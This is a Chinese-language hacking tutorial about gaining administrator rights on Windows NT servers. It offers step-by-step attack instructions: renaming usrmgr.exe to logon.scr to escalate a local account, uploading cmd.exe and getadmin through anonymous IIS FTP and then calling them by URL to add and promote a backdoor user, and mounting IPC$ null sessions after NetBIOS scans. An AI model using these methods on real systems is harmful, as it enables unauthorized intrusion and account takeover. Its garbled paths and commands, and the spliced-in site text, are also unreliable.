导读:动,
即便是Administrastor账户也不安全
。 logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器。 这时他就有权限把自己加到Administrator组,不要忘记把文件名改回来啊! 之二: 下面的技术适用于不重视NT网络安全的网站, 一些 http的技术也可以供较...正文:如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:
之一: 先把c:winntsystem32下的logon.scr改名为logon.old备份,然后把usrmgr.exe改名为logon.scr,然后重新启动。
logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器。
这时他就有权限把自己加到Administrator组,不要忘记把文件名改回来啊!
之二:
下面的技术适用于不重视NT网络安全的网站, 一些 http的技术也可以供较高级的人员参考。进入NT网络可以采取下面的步骤:
因为nt的iis server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。
正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破nt server的机会。我们用ftp登陆一个nt server,比如:www.xxx.com(示例名):
<ccid_code />ftp www.xxx.com connected to www.xxx.com</ccid_code />
<ccid_code />user (www.xxx.comnone)):anonymous password: 输入 guest@ 或者guest</ccid_code />
在这种情况下我们就可以进nt server的ftp了。
进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。
现在,开始查找cgi-bin目录(或者scripts目录)。进去以后,把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin。
然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?iusr_saturn
大约十多秒后屏幕显示:
<ccid_code />cgi error</ccid_code />
电脑资料
《即便是Administrastor账户也不安全》(https://www.unjs.com)。下面可以add user:
<ccid_code />http://www.xxx.com/cgi-bin/cmd.exe?/c c:winntsystem32net.exe user china news /add</ccid_code />
<ccid_code />http://www.xxx.com/cgi-bin/getadmin.exe?china</ccid_code />
<ccid_code />http://www.xxx.com/scripts/tools/getadmin.exe?china</ccid_code />
之三:
用nt的netbios技术扫描
<ccid_code />nbtstat -a http://www.xxx.com/</ccid_code />
<ccid_code />nbtstat -a http://www.xxx.com/</ccid_code />
<ccid_code />net view file:/www.xxx.com/</ccid_code />
<ccid_code />net use f: file:/www.xxx.com/c</ccid_code />
<ccid_code />net use $">/111.111.111.111ipc$content$nbsp;"quot;"quot; /user:"quot;"quot;</ccid_code />
windows95和98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:windump95.exe 使用前还要下载这个库 packet95.exe。
windowsnt用户的版本,windump.exe packetnt.exe